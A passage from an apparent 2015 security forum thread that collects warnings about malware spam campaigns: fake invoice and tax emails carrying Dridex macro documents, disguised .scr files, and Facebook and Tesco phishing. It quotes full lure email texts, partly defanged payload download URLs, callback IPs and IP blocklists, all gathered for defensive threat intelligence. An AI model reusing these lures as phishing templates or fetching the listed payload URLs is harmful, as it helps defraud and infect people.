ingredients but follow recommended bake times or visual indicators in the recipe.
Enjoy!
Please contact me if you have questions or concerns.
Thank you,
Robbin
21 May 2015: Pampered_ingredients.zip: Extracts to: Pampered_ingredients.exe
Current Virus total detections: 3/57* . There are several different versions of the malware floating around. This is just one example. This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/4989d42b831e69a3b50bd4edfd3421e973bf100aad7928dcad59704f3fa18876/analysis/1432205437/
___
Fake 'Unpaid Invoice' SPAM – PDF malware
- http://myonlinesecurity.co.uk/unpaid-invoice-hmrc-fake-pdf-malware/
21 May 2015 - "'Unpaid Invoice' pretending to come from HMRC .gov .uk <application@ hmrc .gov .uk> with a zip attachment is another one from the current bot runs... The email looks like:
Please pay this invoice at your earliest opportunity.
21 May 2015: invoice_8467_08202014.zip: Extracts to: invoice_8467_08202014.scr
Current Virus total detections: 9/57* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/44336ed2ab436a4192c23174b9ebde2bb852fff77d123c60f504e1ec3320191e/analysis/1432226961/
___
Fake 'Invoice# 2976361' SPAM - malicious attachment
- http://blog.dynamoo.com/2015/05/malware-spam-invoice-2976361-attached.html
21 May 2015 - "So far I have only seen one sample of this. The sender and subject may vary.
From: PGOMEZ@ polyair .co .uk
Date: 21 May 2015 at 08:58
Subject: Invoice# 2976361 Attached
Invoice Attached - please confirm...
Attached is a malicious file with the not-very-imaginative name 00001.doc [VT 4/56*] which contains this malicious macro [pastebin] that downloads a component from the following location:
http ://mercury.powerweave .com/72/11.exe
This download site is hosted on 50.97.147.195 (Softlayer Technologies, US / Powerweave Software Services, India), although be aware that other versions of the macro may download from other locations. This file is saved as %TEMP%\ribasiml.exe and has a VirusTotal detection rate of 5/57**. Automated analysis tools... show attempted communications with the following IPs:
78.24.218.186 (TheFirst-RU, Russia)
78.46.60.131 (Hetzner, Germany)
87.236.215.151 (OneGbits, Lithuania)
94.242.58.146 (Fishnet Communications, Russia)
130.208.166.65 (The University of Iceland, Iceland)
176.31.28.250 (OVH, France / Bitweb LLC, Russia)
185.12.95.191 (RuWeb, Russia)
The Malwr report shows that it drops a Dridex DLL with a detection rate of 4/57***.
Recommended blocklist:
78.46.60.131
87.236.215.151
94.242.58.146
130.208.166.65
176.31.28.250
185.12.95.191
50.97.147.195 "
* https://www.virustotal.com/en/file/7435b4478e8c0bf3fef5fdf43998e5ba4ce646a03376ad2c278399437c5185e5/analysis/1432196986/
** https://www.virustotal.com/en/file/41eab1c139eda5740b44ea1dcf82cc427526027a60ada2c6f887a2e74b761c4e/analysis/1432197071/
*** https://www.virustotal.com/en/file/5916c159345858808da9b709349ab6364605da0a27c0392df0cc78ba824598e7/analysis/1432198215/
___
Exploit kits delivering Necurs
- https://isc.sans.edu/diary.html?storyid=19719
2015-05-21 - "In the past few days, we've seen Nuclear and Angler exploit kits (EKs) delivering -malware- identified as Necurs... Necurs is a type of malware that opens a back door on the infected computer [1]. It may also disable antivirus products as well as download additional malware [1][2]... I saw Necurs as a malware payload from Nuclear and Angler EKs last week... In each case, traffic went through a gate on 185.14.30.218 (between the compromised website and the EK landing page). We ran across Nuclear EK delivering Necurs again on 2015-05-20. In this example, the gate was on 91.121.63.249..."
(More detail at the isc URL above.)
1] https://www.symantec.com/security_response/writeup.jsp?docid=2012-121212-2802-99
2] https://www.microsoft.com/security/portal/threat/encyclopedia/Entry.aspx?Name=Trojan:Win32/Necurs
185.14.30.218: https://www.virustotal.com/en/ip-address/185.14.30.218/information/
91.121.63.249: https://www.virustotal.com/en/ip-address/91.121.63.249/information/
___
“Facebook Recovery” accounts share Phishing link, offer Tech Support
- https://blog.malwarebytes.org/fraud-scam/2015/05/facebook-recovery-accounts-share-phishing-link-offer-tech-support/
May 21, 2015 - "We’ve seen a certain j.mp -shortened- URL being shared by what we believe are
-rogue- (if not compromised) accounts within Facebook a couple of days ago. In the below sample we recovered, the URL in question is part of a message from another account called “Facebook recovery” — a truly -fake- one... that is up to task of notifying users that their accounts have been reported for abuse and will likely be disabled if they don’t act on the notice ASAP:
> https://blog.malwarebytes.org/wp-content/uploads/2015/05/facebook-recovery-spam-post.png
The URL, of course, hides the below phishing page:
> https://blog.malwarebytes.org/wp-content/uploads/2015/05/facebook-phishing-page-default.png
The blurb on the page is the same as the spammed message on Facebook. Once a user entered the credentials asked and click Log In, data is posted to recovery.php, and then users are -redirected- to this payment page, which asks for his/her full name, credit card details, and billing address:
> https://blog.malwarebytes.org/wp-content/uploads/2015/05/facebook-phishing-payment.png
We have no idea why all of a sudden the account that claims to be a legitimate entity from Facebook is asking for a form of monetary compensation for the recovery of accounts. Perhaps that is what the phishers meant when they said “help us do more for security and convenience for everyone”. We have looked at the stats for the j.mp URL and found that it didn’t yield that many clicks from the time of its creation up to the present... It’s highly likely that the URL is not shared during these days, making it less visible than your average malicious URL. Less visibility also means that potentially less companies would be able to block it due to flying under the radar. VT results for the j.mp URL shows this*.
* https://www.virustotal.com/en/url/b5e13af6d3f7ae90d5989b9c857299549db23180113b121dc676a48e467126e4/analysis/1432202719/
Furthermore, the majority of clicks are mostly from Asian countries and the United States:
> https://blog.malwarebytes.org/wp-content/uploads/2015/05/clicks-per-country.png
We did a simple search on Facebook for accounts that may contain the string “Facebook recovery”. To date, we found more than 40... If you see posts on your feed that appear similar to the Facebook post we discussed here, whether it continues to bear the same URL or not, it’s best to -ignore- it and warn your network about an on-going -spam- campaign."
recovery-page-php .zz .mu: 185.28.21.145: https://www.virustotal.com/en/ip-address/185.28.21.145/information/
___
"Logjam"...
- https://blog.malwarebytes.org/security-threat/2015/05/the-logjam-attack-what-you-need-to-know/
May 20, 2015 - "... Dubbed as Logjam, the vulnerability affects home users -and- corporations alike, and over 80,000 of the top one million domains worldwide were found to be vulnerable. The original report on Logjam can be found here:
- https://weakdh.org/
... While much of the research is performed against a Diffie-Hellman 512-bit key group, the researchers behind the Logjam discovery also speculate that 1024-bit groups could be vulnerable to those with “nation-state” resources, making a suggestion that groups like the NSA might have already accomplished this... . A comprehensive look at all of their research can be found here:
- https://weakdh.org/imperfect-forward-secrecy.pdf
... At the time of this writing, patches are still in works for all the major web browsers, including Chrome, Firefox, Safari, and Internet Explorer. They should be released in the next day or two, so ensure your browser updates correctly once its released. These updates should reject Diffie-Hellman key lengths that are less that 1024-bits..."
Also see:
- https://isc.sans.edu/diary.html?storyid=19717
2015-05-20
:fear::fear: :mad:
AplusWebMaster
2015-05-22, 14:19
FYI...
Fake 'Australian Tax' SPAM – PDF malware
- http://myonlinesecurity.co.uk/australian-taxation-office-remittance-advisory-email-fake-pdf-malware/
22 May 2015 - "'Australian Taxation Office – Remittance Advisory Email' pretending to come from Australian Taxation Office <noreply@ ato .gov .au> with a link to download a zip file is another one from the current bot runs... The bots seem to be getting very confused today and are mixing up Lloyds Bank with Australian Taxation Office and even using a date 1 year in the past. Nobody should fall for these. The links in the emails currently are set to download from:
- https ://storage-ec2-13.sharefile .com/download.ashx?dt=dt8fdfcdfa200a4b01b93e2643fa61fcc1&h=xw9ZAT0fvavEwl7uRL2DX3xEJcw6II19IbZfNyN1ix0%3d
Update: we are now seeing several different sharefile .com download links. All appear to be the same malware, regardless of the link. The same set of download links are being spammed out in other emails from the same bot net with subjects of 'You’ve received a new fax' appearing to come from fax@ your own domain and 'Internal ONLY' pretending to come from Administrator@ your own domain both alleging to contain a fax message. The email looks like:
Monday 22 May 2014
This is a Remitter Advice following the submission of a payment instruction by Lloyds Bank Plc. Please review the details of the payment here.
Lloyds Banking Group plc. Registered Office: The Mound, Edinburgh EH1 1YZ. Registered in Scotland no. SC95000. Telephone: 0131 225 4555. Lloyds Bank plc. Registered Office: 25 Gresham Street, London EC2V 7HN. Registered in England and Wales no. 2065. Telephone 0207626 1500. Bank of Scotland plc. Registered Office: The Mound, Edinburgh EH1 1YZ. Registered in Scotland no. SC327000. Telephone: 08457 21 31 41. Cheltenham & Gloucester plc. Registered Office: Barnett Way, Gloucester GL4 3RL. Registered in England and Wales 2299428. Telephone: 0845 603 1637
Lloyds Bank plc, Bank of Scotland plc are authorised by the Prudential Regulation Authority and regulated by the Financial Conduct Authority and Prudential Regulation Authority.
Cheltenham & Gloucester plc is authorised and regulated by the Financial Conduct Authority.
Halifax is a division of Bank of Scotland plc. Cheltenham & Gloucester Savings is a division of Lloyds Bank plc.
HBOS plc. Registered Office: The Mound, Edinburgh EH1 1YZ. Registered in Scotland no. SC218813...
22 May 2015 : FAX_82QPL932UN_771.zip: Extracts to: FAX_82QPL932UN_771.scr
Current Virus total detections: 3/57* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/a84ff4f02527bf60135c46f88935b84a245c6b3c1d52485547e7a1a92ded5505/analysis/1432286982/
storage-ec2-13.sharefile .com: 54.84.9.118: https://www.virustotal.com/en/ip-address/54.84.9.118/information/
- http://blog.dynamoo.com/2015/05/malware-spam-this-is-remitter-advice.html
22 May 2015
"... Recommended blocklist:
209.15.197.235
217.23.194.237 "
___
Fake 'Invoice IN278577' SPAM – doc/xls malware
- http://myonlinesecurity.co.uk/your-invoice-in278577-from-out-of-eden-word-doc-or-excel-xls-spreadsheet-malware/
22 May 2015 - "'Your Invoice IN278577 from Out of Eden pretending to come from sales@ outofeden .co .uk with a malicious word doc or Excel XLS spreadsheet attachment is another one from the current bot runs...
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2015/05/Your-Invoice-IN278577-from-Out-of-Eden.png
22 May 2015 : Invoice IN278577 (emailed 2015-05-21).doc
Current Virus total detections: 1/57*... Which downloads www .footingclub .com/85/20.exe which is a Dridex banking Trojan (VirusTotal**)... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/67c9743d34f71a0cece563f93bcc0270dcd0dbe6725dee05fea4f2e7cc9cb298/analysis/1432288366/
** https://www.virustotal.com/en/file/463f5d9fd77d8a96ce3ebd41433b230ccffc1f99331d3103cf7c1c454eb50801/analysis/1432288878/
... Behavioural information
TCP connections
185.12.95.191: https://www.virustotal.com/en/ip-address/185.12.95.191/information/
2.18.213.208: https://www.virustotal.com/en/ip-address/2.18.213.208/information/
:fear::fear: :mad:
AplusWebMaster
2015-05-26, 13:05
FYI...
Fake 'Blank 11' SPAM - doc/xls malware
- http://myonlinesecurity.co.uk/blank-11-hannah-e-righton-word-doc-or-excel-xls-spreadsheet-malware/
26 May 2015 - "'Blank 11' pretending to come from hannah.e.righton@ gmail .com with a malicious word doc or Excel XLS spreadsheet attachment is another one from the current bot runs... This email has what appears to be a genuine word doc or Excel XLS spreadsheet attached which is malformed and contains a macro script virus... The email has a completely blank body.
26 May 2015: Blank 11.doc - Current Virus total detections: 2/57*
The basic rule is NEVER open any attachment to an email, unless you are expecting it... Never just blindly click on the file in your email program..."
* https://www.virustotal.com/en/file/338df2f3f6dd18ed8387f80e1d79669f088d3009e11c6cd8361d41fe5a85021b/analysis/1432633538/
___
Fake 'Invoice' SPAM - doc/xls malware
- http://myonlinesecurity.co.uk/your-invoice-ref-inv232654-from-thomsonlocal-word-doc-or-excel-xls-spreadsheet-malware/
26 May 2015 - "'Your Invoice (ref: INV232654) from thomsonlocal' pretending to come from Pleasedonotreply@ thomsonlocal .com with a malicious word doc or Excel XLS spreadsheet attachment is another one from the current bot runs...
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2015/05/thomson_local_corrupt.png
... It is supposed to look like or read:
> http://myonlinesecurity.co.uk/wp-content/uploads/2015/05/thomson_local.png
26 May 2015: Invoice INV232654.doc - Current Virus total detections: 2/56*
... downloads the same Dridex banking malware as described in today’s other word macro malware downloaders being spammed out 'Blank 11 hannah.e.righton' – word doc or excel xls spreadsheet malware**. This particular macro version downloads from http ://crestliquors .com/73/20.exe
(VirusTotal***) but all the downloads are identical, just from multiple different locations.The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/862d16e4d3ae8bc6902f8afb5fc434f72017cf4e7c67fdbb8287a99ea65c43d3/analysis/1432634028/
** http://myonlinesecurity.co.uk/blank-11-hannah-e-righton-word-doc-or-excel-xls-spreadsheet-malware/
*** https://www.virustotal.com/en/file/e78f5915f825b58be7c44b55c1050a201c9f24e09d794a81810dfe995608eb85/analysis/1432631807/
File name: 20_exe
... Behavioural information
TCP connections
144.76.238.214: https://www.virustotal.com/en/ip-address/144.76.238.214/information/
88.221.14.249: https://www.virustotal.com/en/ip-address/88.221.14.249/information/
crestliquors .com: 64.29.151.221: https://www.virustotal.com/en/ip-address/64.29.151.221/information/
___
Fake 'Underreported Income' SPAM – PDF malware
- http://myonlinesecurity.co.uk/notice-of-underreported-income-australian-taxation-office-and-sage-outdated-invoice-fake-pdf-malware/
26 May 2015 - "'Notice of Underreported Income' pretending to come from Australian Taxation Office <noreply@ ato .gov .au> and 'Outdated Invoice' pretending to come from Sage Invoice <invoice@ sage .com> with a -link- in the body of the email to download a zip file is another one from the current bot runs... The Australian Taxation Office email looks like:
Taxpayer ID: ufwsd-000008882579UK Tax Type: Income Tax Issue: Unreported/Underreported Income (Fraud Application) Please review your tax income statement on HM Revenue and Customs ( HMRC). Download your HMRC statement. Please complete the form...
The links in these emails go to https ://a .uguu .se/hivjca_Invoice_00471200.zip (Note the HTTPS) which gives a not found message. If you drop the S and just use a standard HTTP link then you get the malware. The Sage invoice looks like:
Sage Account & Payroll
You have an outdated invoice from Sage Accounting that is ready for payment. To find out more details on this invoice, please follow the link bellow or click here to view/download your account invoice:
https ://invoice .sage .co.uk/Account?769525=Invoice_090914.zip
If we hold any information about you which is incorrect or if there are any changes to your details please let us know by so that we can keep our records accurate and up to date. If you would like to update your records or see a copy of the information that we hold about you, you can contact us at Data Protection Officer, Sage (UK) Ltd, North Park, Newcastle-upon-Tyne, NE13 9AA or by email to digital@ sage .com. If you request a copy of your information you will need to pay a statutory fee which is currently £10.
The contents of this email and any attachments are confidential. They are intended for the named recipient(s) only. If you have received this email in error please notify the system manager or the sender immediately and do not disclose the contents to anyone or make copies...
26 May 2015: ytuads_Invoice_00471206.zip: Extracts to: Invoice_00471206.scr
Current Virus total detections: 5/57* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/c7819359b0317b4ad5941993d662e6ce4b405bcabe93e04dde56d045b4841b97/analysis/1432638854/
Invoice_00471203.scr
... Behavioural information
TCP connections
104.238.136.31: https://www.virustotal.com/en/ip-address/184.95.37.110/information/
93.185.4.90: https://www.virustotal.com/en/ip-address/93.185.4.90/information/
66.215.30.118: https://www.virustotal.com/en/ip-address/66.215.30.118/information/
88.221.14.249: https://www.virustotal.com/en/ip-address/88.221.14.249/information/
uguu .se:
104.28.24.2: https://www.virustotal.com/en/ip-address/104.28.24.2/information/
104.28.25.2: https://www.virustotal.com/en/ip-address/104.28.25.2/information/
___
Fake 'Invoice' SPAM – PDF malware
- http://myonlinesecurity.co.uk/775-westminster-avenue-apt-d5-fw-invoice-fake-pdf-malware/
26 May 2015 - "'775 Westminster Avenue APT D5 Fw: Invoice' coming from random email addresses and names with a zip attachment is another one from the current bot runs... The email looks like:
Name: Invoice
Customer ID: 718527
Street Address
775 Westminster Avenue APT D5
Brooklyn, NY, 01748
Phone: (235) 194-2842
The customer ID number, The NY code and the Phone numbers are all random and different in each email. The attachment zip names are also random but all extract to the same invoice_company.exe
26 May 2015: 030018-.zip: Extracts to: invoice_company.exe
Current Virus total detections: 4/57* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/d2f23f1ff7a12fb5d165953401c99d2c73845b842ef1d88794902fa7a1a481bc/analysis/1432647309/
___
Tesco – Phish ...
- http://myonlinesecurity.co.uk/collect-a-80gbp-reward-tesco-phishing/
26 May 2015 - "'Collect a 80GBP reward!' pretending to come from Tesco <postmaster@ tescoina .com>. It is the end of May, just after the bank holiday. You have spent up to your limit on the credit cards and are wondering how to pay they bills until the next pay cheque arrives, when what looks like a miracle happens. An email arrives apparently from Tesco saying Collect a 80GBP reward! that offers you £80 for filling in a Tesco customer satisfaction -survey... it is a -scam- and is a phishing fraud designed to steal your bank and credit card details... If you open the link you see a webpage looking like this: (I had to split it into 2 parts to take a screenshot):
> http://myonlinesecurity.co.uk/wp-content/uploads/2014/02/Tesco-survey1.png
> http://myonlinesecurity.co.uk/wp-content/uploads/2014/02/Tesco-survey2.png
All of these emails use Social engineering tricks to persuade you to open the attachments that come with the email or follow links in them..."
:fear::fear: :mad:
AplusWebMaster
2015-05-27, 16:11
FYI...
Fake 'INV-152307' SPAM - doc/xls malware
- http://myonlinesecurity.co.uk/anthony-alexandra-associates-may-inv-152307-gbp-418-80-lauren-braisby-reed-co-uk-word-doc-or-excel-xls-spreadsheet-malware/
27 May 2015 - "'Anthony Alexandra Associates MAY INV-152307 GBP 418.80' pretending to come from Lauren Braisby <lauren.braisby@ reed .co .uk> with a malicious word doc or Excel XLS spreadsheet attachment is another one from the current bot runs...
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2015/05/Anthony-Alexandra-Associates-MAY-INV-152307-GBP-418.80.png
25 February 2015: logmein_pro_receipt.xls - Current Virus total detections: 1/57*
... which downloads Dridex banking malware from http ://wingtouch .com/776/331.exe (VirusTotal**)... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/c04cc13a337103fcd1eb270a2c89ae34aee1c7c024da445bebdf1d87d8315859/analysis/1432725577/
** https://www.virustotal.com/en/file/ae06347a89bc8882ea1ad1e49d3d1bee1a84ad0bc472ffe3605a8e68f0fd8d5f/analysis/1432727693/
... Behavioural information
TCP connections
185.11.247.226: https://www.virustotal.com/en/ip-address/185.11.247.226/information/
88.221.14.249: https://www.virustotal.com/en/ip-address/88.221.14.249/information/
wingtouch .com: 64.29.151.221: https://www.virustotal.com/en/ip-address/64.29.151.221/information/
___
Fake 'Invoice charge' SPAM – doc/xls malware
- http://myonlinesecurity.co.uk/announce-of-importance-invoice-charge-word-doc-or-excel-xls-spreadsheet-malware/
27 May 2015 - "'Announce of importance: Invoice charge' coming from random names, companies and email addresses with a malicious word doc or Excel XLS spreadsheet attachment is another one from the current bot runs... The emails looks like:
Hi,
Please see attached the copy of invoice from 22/05/2015.
Please can you send a revised statement so we can settle any outstanding balances.
Kind Regards,
Mason Lloyd
-Or-
Your monthly Rainbow Communications invoice is attached to this mail.
This bill is for account RT963382
Please note that for those who receive multiple reports you may need to check your attachment field on your e-mail program to ensure that you have received them all.
Louie Hood
Business Account Manager
-Or-
Good morning,
Our billing department have identified that you are getting both a hard copy and an e-mail copy of your bill. As a result you will be getting a monthly £3 hard copy fee.
Can you let me know if the hard copy can be removed?
Kind regards
Angie Ayers
Business Account Manager
27 May 2015 : F6F0_C6C7DE4EE83EDC.doc - No detections anywhere and all automatic analysis has failed. The file appears to be base 64 encoded text that I haven’t yet managed to decode and find a working content...
Update: 2nd version 25B5F_7B101029E76005.doc (VirusTotal*), so far I haven’t found a payload and the only automatic analysis hasn’t found anything... The basic rule is NEVER open any attachment to an email, unless you are expecting it... Never just blindly click on the file in your email program..."
* https://www.virustotal.com/en/file/a400f9e424ff08c764cc98562613ea94200d438d58fa6dcb0ce545d8070d5cf5/analysis/1432729315/
File name: 25B5F_7B101029E76005.doc
Detection ratio: 0/57
___
Fake 'Statement' SPAM – doc/xls malware
- http://myonlinesecurity.co.uk/statement-from-word-doc-or-excel-xls-spreadsheet-malware/
27 May 2015 - "'Statement from [random company]' coming from random companies, names and email addresses with a malicious word doc or Excel XLS spreadsheet attachment is another one from the current bot runs... The email looks like:
Please see attached statement.
Please be advised that our company is now incorporated andtrades as DOMINO’S PIZZA GROUP PLC. Ourbank is still Ulster Bank, 14 High Street, Omagh, Co. Tyrone, BT78 1BJ with newaccount details as follows:
Sort Code: 98-12-30
Account Number: 10991670
Ulster Bank has switched over our direct debits etc. for usso please take this letter as notification of same.
Our company number isNI624042.
DOMINO’S PIZZA GROUP PLC VAT registration number: GB184578365.
We would also like to take this opportunity to thank you for your continuedsupport. If you should need any further information then please do not hesitateto contact us.
Regards,
Della Medina
Accounts Dept.
-Or-
Please see attached statement.
Please be advised that our company is now incorporated andtrades as Cleantec Equipment Ltd. Ourbank is still Ulster Bank, 14 High Street, Omagh, Co. Tyrone, BT78 1BJ with newaccount details as follows:
Sort Code: 98-12-30
Account Number: 10991670
Ulster Bank has switched over our direct debits etc. for usso please take this letter as notification of same.
Our company number isNI624042.
Cleantec Equipment Ltd VAT registration number: GB184578365.
We would also like to take this opportunity to thank you for your continuedsupport. If you should need any further information then please do not hesitateto contact us.
Regards,
Dallas Dickerson
Accounts Dept.
27 May 2015: 0A15_968CD62833A4B.doc - Current Virus total detections: 0/56*
... Once again today Analysis -fails- to give any download locations. It looks like the same behaviour as today’s earlier attempt Announce of importance: Invoice charge – word doc or excel xls spreadsheet malware**... The basic rule is NEVER open any attachment to an email, unless you are expecting it... Never just blindly click on the file in your email program..."
* https://www.virustotal.com/en/file/5bafc7c90591d2daaaa3e498a4f294f42b3230cb803abb4884d5ee50ebed8988/analysis/1432735276/
** http://myonlinesecurity.co.uk/announce-of-importance-invoice-charge-word-doc-or-excel-xls-spreadsheet-malware/
___
Chrome Lure used in Facebook Attack ...
- http://blog.trendmicro.com/trendlabs-security-intelligence/chrome-lure-used-in-facebook-attack-despite-googles-new-policy/
May 26, 2015 - "... cybercriminals keep using Google Chrome and Facebook to infect their victims with malware... We’ve already seen both platforms be used as parts of malicious social engineering schemes. Both Google and Facebook are aware of this and have taken steps to protect their users. The number of times malicious Chrome extensions have sprouted, for example, has driven Google to restrict the use of any extension not available on the Chrome Web Store. Unfortunately, initiatives like these have not deterred cybercriminal efforts. Our findings also show that many of these platforms users still get tricked.
Message on Facebook: Clicking the link led us to a site with a page designed to mimic the look and feel of Facebook. The page even pretends to have content from YouTube. Visiting the -malicious- site led to the automatic download of a file titled Chrome_Video_installer.scr. The filename used makes it seem that it’s a harmless Chrome browser plugin required to play videos.
Malicious page with the Facebook design: This supposed video installer file is detected as TROJ_KILIM.EFLD. This variant attempts to download another file — possibly the final payload — but the site is currently down. However, it should be noted that KILIM malware are known to be -malicious- Chrome extensions and plugins. KILIM variants have also been observed to spam Facebook messages and cause system infection... We checked the landing page and found out that the Philippines had the most number of users who visited the site, followed by those from Indonesia, India, Brazil, and the U.S... these countries are the same ones reported to have the highest percentage in terms of Facebook penetration... Given the popularity of Facebook, members of the site must be discerning when it comes to dealing with the content they come across with. -Never- click links from unknown or unverified sites, especially if the content sounds too interesting to be true. Cybercriminals often use shocking or eye-catching content to convince users to visit malicious websites. It’s far better to click links that lead to a reputable source than some random blog or site. The Trend Micro Site Safety Center* can also be used to check if websites are safe or not. The same can be said for links or attachments sent by friends. It’s worth the effort to first confirm the message before clicking the link or opening the attachment..."
* http://global.sitesafety.trendmicro.com/
:fear::fear: :mad:
AplusWebMaster
2015-05-28, 14:59
FYI...
Fake 'latest invoice' SPAM – doc/xls malware
- http://myonlinesecurity.co.uk/your-latest-invoice-from-the-fuelcard-company-uk-ltd-word-doc-or-excel-xls-spreadsheet-malware/
28 May 2015 - "'Your latest invoice from The Fuelcard Company UK Ltd' pretending to come from invoicing@ fuelcards .co .uk with a malicious word doc or Excel XLS spreadsheet attachment is another one from the current bot runs... The email looks like:
Please find your latest invoice attached.
If you have any queries please do not hesitate to contact our Customer
Service Team at invoicing@ fuelcards .co .uk
Regards
The Fuelcard Compa
28 May 2015: invoice.doc - Current Virus total detections: 2/57*
... This malicious macro downloads http ://contesafricains .com/01/59.exe (VirusTotal**)... The basic rule is NEVER open any attachment to an email, unless you are expecting it... Never just blindly click on the file in your email program..."
* https://www.virustotal.com/en/file/3a1cd4d19bd7e366994eab61f2d6402e12d5720ca1cd29a788c9a72b51b71bfa/analysis/1432800000/
** https://www.virustotal.com/en/file/2c2a1287aeddd985e0528bb3edee04dad1e520d6fcda4920206d10b6c147ac2d/analysis/1432800544/
... Behavioural information
TCP connections
134.0.115.157: https://www.virustotal.com/en/ip-address/134.0.115.157/information/
88.221.15.80: https://www.virustotal.com/en/ip-address/88.221.15.80/information/
contesafricains .com: 213.186.33.19: https://www.virustotal.com/en/ip-address/213.186.33.19/information/
___
Fake 'Chasing delivery' SPAM – doc/xls malware
- http://myonlinesecurity.co.uk/212-b59329-23a-chasing-delivery-rachel-hopkinson-anixter-com-word-doc-or-excel-xls-spreadsheet-malware/
28 May 2015 - "'212-B59329-23A – Chasing delivery' pretending to come from Rachel.Hopkinson@ anixter .com with a malicious word doc or Excel XLS spreadsheet attachment is another one from the current bot runs...
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2015/05/212-B59329-23A-Chasing-delivery.png
28 May 2015 : RR1A240D.doc - Current Virus total detections: 2/57*
... downloads http ://swiftlaw .com/01/59.exe** which is same Dridex banking malware as today’s earlier malicious word doc malspam run 'Your latest invoice from The Fuelcard Company UK Ltd – word doc or excel xls spreadsheet malware'**... The basic rule is NEVER open any attachment to an email, unless you are expecting it... Never just blindly click on the file in your email program..."
* https://www.virustotal.com/en/file/33af46478e4d24a3c47678b846f370ac7b10c2e7588bb048d272c077e9f6c892/analysis/1432811062/
** http://myonlinesecurity.co.uk/your-latest-invoice-from-the-fuelcard-company-uk-ltd-word-doc-or-excel-xls-spreadsheet-malware/
swiftlaw .com: 216.251.32.98: https://www.virustotal.com/en/ip-address/216.251.32.98/information/
:fear::fear: :mad:
AplusWebMaster
2015-06-01, 15:00
FYI...
Fake email SPAM - doc/xls malware attachment
- http://myonlinesecurity.co.uk/uplata-po-pon-43421-mirjana-prgomet-fokus-medical-word-doc-or-excel-xls-spreadsheet-malware/
1 Jun 2015 - "'Uplata po pon 43421' pretending to come from Mirjana Prgomet <mirjana@ fokus-medical .hr> with a malicious word doc or Excel XLS spreadsheet attachment is another one from the current bot runs... The email has a totally -blank- body with just an attachment.
1 June 2015: report20520159260[1].doc - Current Virus total detections: 1/56*
... downloads Dridex banking malware from http ://jcmartz .com/1/09.exe (VirusTotal**)... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/8561708d67dde5556aaf0d6d02d88b58ea6083801dea594263c1b4d749100f27/analysis/1433147275/
** https://www.virustotal.com/en/file/8561708d67dde5556aaf0d6d02d88b58ea6083801dea594263c1b4d749100f27/analysis/1433147275/
... Behavioural information
TCP connections
31.186.99.250: https://www.virustotal.com/en/ip-address/31.186.99.250/information/
88.221.15.80: https://www.virustotal.com/en/ip-address/88.221.15.80/information/
jcmartz .com: 66.175.58.9: https://www.virustotal.com/en/ip-address/66.175.58.9/information/
- http://blog.dynamoo.com/2015/06/malware-spam-uplata-po-pon-43421.html
1 Jun 2015
"... Recommended blocklist:
31.186.99.250
107.170.1.205
146.185.128.226
144.76.238.214 "
___
Fake 'slide1' SPAM - doc/xls malware attachment
- http://myonlinesecurity.co.uk/emailing-slide1-date-mon-01-jun-2015-143647-0200-simon-harrington-word-doc-or-excel-xls-spreadsheet-malware/
1 Jun 2015 - "'Emailing: slide1 Date: Mon, 01 Jun 2015 14:36:47 +0200' pretending to come from Simon Harrington <simonharrington@ talktalk .net> with a malicious word doc or Excel XLS spreadsheet attachment is another one from the current bot runs...
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2015/06/Emailing-slide1.png
1 Jun 2015 : slide1.doc - Current Virus total detections:2/56*
... which connects to and downloads http ://216.22.14.37/~congafx/1/09.exe which is an updated Dridex banking malware (VirusTotal**)... It is using the same file name as today’s earlier malspam run but is a totally different file size Uplata po pon 43421 -Mirjana Prgomet – fokus-medical – word doc or excel xls spreadsheet malware***... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/27f42ab0e59ad92ead7582df0a842a5d8dfb62adf9fd16fc673afa0b279e2323/analysis/1433162360/
** https://www.virustotal.com/en/file/43e4634222b015de08c1e820365ae48eeaea0f1a9f187db1d7b91cc79c55ab09/analysis/
*** http://myonlinesecurity.co.uk/uplata-po-pon-43421-mirjana-prgomet-fokus-medical-word-doc-or-excel-xls-spreadsheet-malware/
216.22.14.37: https://www.virustotal.com/en/ip-address/216.22.14.37/information/
- http://blog.dynamoo.com/2015/06/malware-spam-simonharringtontalktalknet.html
1 Jun 2015
"... Recommended blocklist:
31.186.99.250
107.170.1.205
146.185.128.226
144.76.238.214 ..."
___
Fake 'Order confirmation' SPAM – doc/xls malware
- http://myonlinesecurity.co.uk/order-confirmation-300-2015001469-word-doc-or-excel-xls-spreadsheet-malware/
1 Jun 2015 - "'Order confirmation 300-2015001469' with no apparent -from- address or -sender- & a
-blank- empty body that is addressed to:
To: <p.pichler@ allfi .com<randomname>@ Your email domain> with a malicious word doc or Excel XLS spreadsheet attachment is another one from the current bot runs... The email has a completely blank body.
1 June 2015: Order confirmation 300-2015001469.doc - Current Virus total detections: 4/56* ... downloads the same Dridex banking Trojan as one of today’s earlier word based malspam runs Emailing: slide1 Date: Mon, 01 Jun 2015 14:36:47 +0200 – Simon Harrington – word doc or excel xls spreadsheet malware**. The single version I examined downloaded from http ://irpanet .com/1/09.exe but there are -multiple- download locations... The basic rule is NEVER open any attachment to an email, unless you are expecting it... Never just blindly click on the file in your email program..."
